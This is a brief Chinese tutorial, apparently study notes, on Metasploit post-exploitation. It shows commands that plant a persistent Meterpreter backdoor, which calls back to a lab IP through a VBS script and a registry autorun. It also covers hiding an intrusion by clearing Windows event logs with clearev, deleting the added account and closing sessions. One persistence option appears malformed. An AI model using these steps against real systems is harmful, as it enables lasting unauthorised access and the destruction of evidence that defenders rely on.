目录

一、权限维持创建后门

1.1、概述：

1.2、过程：

二、清除痕迹

2.1、第一步：日志

2.2、第二步：清理额外信息

2.3、第三步：MSF清理

一、权限维持创建后门

1.1、概述：

获取目标系统的访问权限后，如果目标用户破坏了该连接（重启），所以需要在此之前，创建一个后门来恢复与目标主机的连接，而无需再进入目标系统。，此时使用后门将允许自动重新与目标系统建立连接。

1.2、过程：

激活Meterpreter会话

sessions -i 2

---

查看帮助命令

run persistence -h

---

结合不同的选项，创建一个持久后门

run persistence -U -A -i 10 - 8090 -r 192.168.190.149

---

输出的信息显示创建后门过程，在目标系统中创建了一个持久脚本（保存在C:\DOCUME~l\Test\LOCALS~I\Temp\lzXBdJvcpnD.vbs）并篡改注册表，该脚本会自动在目标主机上运行， 并将会建立第二个Meterpreter会话。

---

验证后门

关闭攻击会话，并重启目标机

监听目标，重启后能上线获得攻击会话

---

注

就算远控木马文件payload.exe被清除，但后门还在

如果后门脚本、注册表注册项清除，将无法再控制

二、清除痕迹

（如果提示：stdapi_sys_eventlog_clear：操作失败：访问被拒绝）

（操作前都是需要提权的，如getsystem提取，或者查看补丁信息后提权）

2.1、第一步：日志

为了不暴露攻击者的痕迹行为，需要清除系统事件

打开 Windows 事件查看器（可以看到日志信息）

直接在控制面板搜

 

2.2、第二步：清理额外信息

删除添加的账号
net user 添加的用户名 /del


退出目标服务器的shell
exit  或者  logoff


删除日志
clearev

2.3、第三步：MSF清理

退出meterpreter shell
exit


查看所有的MSF连接
sessions


关闭所有的MSF链接(或指定的)
sessions -K